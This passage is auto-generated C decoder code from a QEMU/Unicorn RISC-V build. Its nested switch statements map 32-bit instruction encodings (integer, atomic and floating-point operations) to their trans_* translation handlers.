*/ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_sltiu(ctx, &u.f_i)) return true; return false; case 0x4: /* ........ ........ .100.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:107 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_xori(ctx, &u.f_i)) return true; return false; case 0x5: /* ........ ........ .101.... .0010011 */ decode_insn32_extract_sh(ctx, &u.f_shift, insn); switch ((insn >> 30) & 0x3) { case 0x0: /* 00...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:111 */ if (trans_srli(ctx, &u.f_shift)) return true; return false; case 0x1: /* 01...... ........ .101.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:112 */ if (trans_srai(ctx, &u.f_shift)) return true; return false; } return false; case 0x6: /* ........ ........ .110.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:108 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_ori(ctx, &u.f_i)) return true; return false; case 0x7: /* ........ ........ .111.... .0010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:109 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_andi(ctx, &u.f_i)) return true; return false; } return false; case 0x00000017: /* ........ ........ ........ .0010111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:87 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_auipc(ctx, &u.f_u)) return true; return false; case 0x0000001b: /* ........ ........ ........ .0011011 */ switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:30 */ decode_insn32_extract_i(ctx, &u.f_i, insn); if (trans_addiw(ctx, &u.f_i)) return true; return false; case 0x1: /* ........ ........ .001.... .0011011 */ decode_insn32_extract_sh5(ctx, &u.f_shift, insn); switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ .001.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:31 */ if (trans_slliw(ctx, &u.f_shift)) return true; return false; } return false; case 0x5: /* ........ ........ .101.... .0011011 */ decode_insn32_extract_sh5(ctx, &u.f_shift, insn); switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ .101.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:32 */ if (trans_srliw(ctx, &u.f_shift)) return true; return false; case 0x20: /* 0100000. ........ .101.... .0011011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:33 */ if (trans_sraiw(ctx, &u.f_shift)) return true; return false; } return false; } return false; case 0x00000023: /* ........ ........ ........ .0100011 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* ........ ........ .000.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:101 */ if (trans_sb(ctx, &u.f_s)) return true; return false; case 0x1: /* ........ ........ .001.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:102 */ if (trans_sh(ctx, &u.f_s)) return true; return false; case 0x2: /* ........ ........ .010.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:103 */ if (trans_sw(ctx, &u.f_s)) return true; return false; case 0x3: /* ........ ........ .011.... .0100011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:29 */ if (trans_sd(ctx, &u.f_s)) return true; return false; } return false; case 0x00000027: /* ........ ........ ........ .0100111 */ decode_insn32_extract_s(ctx, &u.f_s, insn); switch ((insn >> 12) & 0x7) { case 0x2: /* ........ ........ .010.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:157 */ if (trans_fsw(ctx, &u.f_s)) return true; return false; case 0x3: /* ........ ........ .011.... .0100111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:185 */ if (trans_fsd(ctx, &u.f_s)) return true; return false; } return false; case 0x0000002f: /* ........ ........ ........ .0101111 */ switch (insn & 0xf8007000) { case 0x00002000: /* 00000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:146 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoadd_w(ctx, &u.f_atomic)) return true; return false; case 0x00003000: /* 00000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:51 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoadd_d(ctx, &u.f_atomic)) return true; return false; case 0x08002000: /* 00001... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:145 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoswap_w(ctx, &u.f_atomic)) return true; return false; case 0x08003000: /* 00001... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:50 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoswap_d(ctx, &u.f_atomic)) return true; return false; case 0x10002000: /* 00010... ........ .010.... .0101111 */ decode_insn32_extract_atom_ld(ctx, &u.f_atomic, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 00010..0 0000.... .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:143 */ if (trans_lr_w(ctx, &u.f_atomic)) return true; return false; } return false; case 0x10003000: /* 00010... ........ .011.... .0101111 */ decode_insn32_extract_atom_ld(ctx, &u.f_atomic, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 00010..0 0000.... .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:48 */ if (trans_lr_d(ctx, &u.f_atomic)) return true; return false; } return false; case 0x18002000: /* 00011... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:144 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_sc_w(ctx, &u.f_atomic)) return true; return false; case 0x18003000: /* 00011... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:49 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_sc_d(ctx, &u.f_atomic)) return true; return false; case 0x20002000: /* 00100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:147 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoxor_w(ctx, &u.f_atomic)) return true; return false; case 0x20003000: /* 00100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:52 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoxor_d(ctx, &u.f_atomic)) return true; return false; case 0x40002000: /* 01000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:149 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoor_w(ctx, &u.f_atomic)) return true; return false; case 0x40003000: /* 01000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:54 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoor_d(ctx, &u.f_atomic)) return true; return false; case 0x60002000: /* 01100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:148 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoand_w(ctx, &u.f_atomic)) return true; return false; case 0x60003000: /* 01100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:53 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amoand_d(ctx, &u.f_atomic)) return true; return false; case 0x80002000: /* 10000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:150 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomin_w(ctx, &u.f_atomic)) return true; return false; case 0x80003000: /* 10000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:55 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomin_d(ctx, &u.f_atomic)) return true; return false; case 0xa0002000: /* 10100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:151 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomax_w(ctx, &u.f_atomic)) return true; return false; case 0xa0003000: /* 10100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:56 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomax_d(ctx, &u.f_atomic)) return true; return false; case 0xc0002000: /* 11000... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:152 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amominu_w(ctx, &u.f_atomic)) return true; return false; case 0xc0003000: /* 11000... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:57 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amominu_d(ctx, &u.f_atomic)) return true; return false; case 0xe0002000: /* 11100... ........ .010.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:153 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomaxu_w(ctx, &u.f_atomic)) return true; return false; case 0xe0003000: /* 11100... ........ .011.... .0101111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:58 */ decode_insn32_extract_atom_st(ctx, &u.f_atomic, insn); if (trans_amomaxu_d(ctx, &u.f_atomic)) return true; return false; } return false; case 0x00000033: /* ........ ........ ........ .0110011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch (insn & 0xfe007000) { case 0x00000000: /* 0000000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:113 */ if (trans_add(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 0000000. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:115 */ if (trans_sll(ctx, &u.f_r)) return true; return false; case 0x00002000: /* 0000000. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:116 */ if (trans_slt(ctx, &u.f_r)) return true; return false; case 0x00003000: /* 0000000. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:117 */ if (trans_sltu(ctx, &u.f_r)) return true; return false; case 0x00004000: /* 0000000. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:118 */ if (trans_xor(ctx, &u.f_r)) return true; return false; case 0x00005000: /* 0000000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:119 */ if (trans_srl(ctx, &u.f_r)) return true; return false; case 0x00006000: /* 0000000. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:121 */ if (trans_or(ctx, &u.f_r)) return true; return false; case 0x00007000: /* 0000000. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:122 */ if (trans_and(ctx, &u.f_r)) return true; return false; case 0x02000000: /* 0000001. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:133 */ if (trans_mul(ctx, &u.f_r)) return true; return false; case 0x02001000: /* 0000001. ........ .001.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:134 */ if (trans_mulh(ctx, &u.f_r)) return true; return false; case 0x02002000: /* 0000001. ........ .010.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:135 */ if (trans_mulhsu(ctx, &u.f_r)) return true; return false; case 0x02003000: /* 0000001. ........ .011.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:136 */ if (trans_mulhu(ctx, &u.f_r)) return true; return false; case 0x02004000: /* 0000001. ........ .100.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:137 */ if (trans_div(ctx, &u.f_r)) return true; return false; case 0x02005000: /* 0000001. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:138 */ if (trans_divu(ctx, &u.f_r)) return true; return false; case 0x02006000: /* 0000001. ........ .110.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:139 */ if (trans_rem(ctx, &u.f_r)) return true; return false; case 0x02007000: /* 0000001. ........ .111.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:140 */ if (trans_remu(ctx, &u.f_r)) return true; return false; case 0x40000000: /* 0100000. ........ .000.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:114 */ if (trans_sub(ctx, &u.f_r)) return true; return false; case 0x40005000: /* 0100000. ........ .101.... .0110011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:120 */ if (trans_sra(ctx, &u.f_r)) return true; return false; } return false; case 0x00000037: /* ........ ........ ........ .0110111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:86 */ decode_insn32_extract_u(ctx, &u.f_u, insn); if (trans_lui(ctx, &u.f_u)) return true; return false; case 0x0000003b: /* ........ ........ ........ .0111011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch (insn & 0xfe007000) { case 0x00000000: /* 0000000. ........ .000.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:34 */ if (trans_addw(ctx, &u.f_r)) return true; return false; case 0x00001000: /* 0000000. ........ .001.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:36 */ if (trans_sllw(ctx, &u.f_r)) return true; return false; case 0x00005000: /* 0000000. ........ .101.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:37 */ if (trans_srlw(ctx, &u.f_r)) return true; return false; case 0x02000000: /* 0000001. ........ .000.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:41 */ if (trans_mulw(ctx, &u.f_r)) return true; return false; case 0x02004000: /* 0000001. ........ .100.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:42 */ if (trans_divw(ctx, &u.f_r)) return true; return false; case 0x02005000: /* 0000001. ........ .101.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:43 */ if (trans_divuw(ctx, &u.f_r)) return true; return false; case 0x02006000: /* 0000001. ........ .110.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:44 */ if (trans_remw(ctx, &u.f_r)) return true; return false; case 0x02007000: /* 0000001. ........ .111.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:45 */ if (trans_remuw(ctx, &u.f_r)) return true; return false; case 0x40000000: /* 0100000. ........ .000.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:35 */ if (trans_subw(ctx, &u.f_r)) return true; return false; case 0x40005000: /* 0100000. ........ .101.... .0111011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:38 */ if (trans_sraw(ctx, &u.f_r)) return true; return false; } return false; case 0x00000043: /* ........ ........ ........ .1000011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:158 */ if (trans_fmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:186 */ if (trans_fmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000047: /* ........ ........ ........ .1000111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:159 */ if (trans_fmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1000111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:187 */ if (trans_fmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004b: /* ........ ........ ........ .1001011 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:160 */ if (trans_fnmsub_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:188 */ if (trans_fnmsub_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x0000004f: /* ........ ........ ........ .1001111 */ decode_insn32_extract_r4_rm(ctx, &u.f_decode_insn3210, insn); switch ((insn >> 25) & 0x3) { case 0x0: /* .....00. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:161 */ if (trans_fnmadd_s(ctx, &u.f_decode_insn3210)) return true; return false; case 0x1: /* .....01. ........ ........ .1001111 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:189 */ if (trans_fnmadd_d(ctx, &u.f_decode_insn3210)) return true; return false; } return false; case 0x00000053: /* ........ ........ ........ .1010011 */ switch ((insn >> 25) & 0x7f) { case 0x0: /* 0000000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:162 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x1: /* 0000001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:190 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fadd_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x4: /* 0000100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:163 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x5: /* 0000101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:191 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fsub_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x8: /* 0001000. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:164 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0x9: /* 0001001. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:192 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fmul_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0xc: /* 0001100. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:165 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_s(ctx, &u.f_decode_insn3211)) return true; return false; case 0xd: /* 0001101. ........ ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:193 */ decode_insn32_extract_r_rm(ctx, &u.f_decode_insn3211, insn); if (trans_fdiv_d(ctx, &u.f_decode_insn3211)) return true; return false; case 0x10: /* 0010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:167 */ if (trans_fsgnj_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:168 */ if (trans_fsgnjn_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:169 */ if (trans_fsgnjx_s(ctx, &u.f_r)) return true; return false; } return false; case 0x11: /* 0010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:195 */ if (trans_fsgnj_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:196 */ if (trans_fsgnjn_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 0010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:197 */ if (trans_fsgnjx_d(ctx, &u.f_r)) return true; return false; } return false; case 0x14: /* 0010100. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010100. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:170 */ if (trans_fmin_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010100. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:171 */ if (trans_fmax_s(ctx, &u.f_r)) return true; return false; } return false; case 0x15: /* 0010101. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 0010101. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:198 */ if (trans_fmin_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 0010101. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:199 */ if (trans_fmax_d(ctx, &u.f_r)) return true; return false; } return false; case 0x20: /* 0100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x1: /* 01000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:200 */ if (trans_fcvt_s_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x21: /* 0100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:201 */ if (trans_fcvt_d_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2c: /* 0101100. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:166 */ if (trans_fsqrt_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x2d: /* 0101101. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 01011010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:194 */ if (trans_fsqrt_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x50: /* 1010000. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010000. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:177 */ if (trans_fle_s(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010000. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:176 */ if (trans_flt_s(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010000. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:175 */ if (trans_feq_s(ctx, &u.f_r)) return true; return false; } return false; case 0x51: /* 1010001. ........ ........ .1010011 */ decode_insn32_extract_r(ctx, &u.f_r, insn); switch ((insn >> 12) & 0x7) { case 0x0: /* 1010001. ........ .000.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:204 */ if (trans_fle_d(ctx, &u.f_r)) return true; return false; case 0x1: /* 1010001. ........ .001.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:203 */ if (trans_flt_d(ctx, &u.f_r)) return true; return false; case 0x2: /* 1010001. ........ .010.... .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:202 */ if (trans_feq_d(ctx, &u.f_r)) return true; return false; } return false; case 0x60: /* 1100000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:172 */ if (trans_fcvt_w_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:173 */ if (trans_fcvt_wu_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11000000 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:61 */ if (trans_fcvt_l_s(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11000000 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:62 */ if (trans_fcvt_lu_s(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x61: /* 1100001. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11000010 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:206 */ if (trans_fcvt_w_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11000010 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:207 */ if (trans_fcvt_wu_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x2: /* 11000010 0010.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:67 */ if (trans_fcvt_l_d(ctx, &u.f_decode_insn3212)) return true; return false; case 0x3: /* 11000010 0011.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32-64.decode:68 */ if (trans_fcvt_lu_d(ctx, &u.f_decode_insn3212)) return true; return false; } return false; case 0x68: /* 1101000. ........ ........ .1010011 */ decode_insn32_extract_r2_rm(ctx, &u.f_decode_insn3212, insn); switch ((insn >> 20) & 0x1f) { case 0x0: /* 11010000 0000.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:179 */ if (trans_fcvt_s_w(ctx, &u.f_decode_insn3212)) return true; return false; case 0x1: /* 11010000 0001.... ........ .1010011 */ /* /home/me/projects/unicorn2/qemu-5.0.0-build/target/riscv/insn32.decode:180 */ if (trans_fcvt_s_wu(ctx, 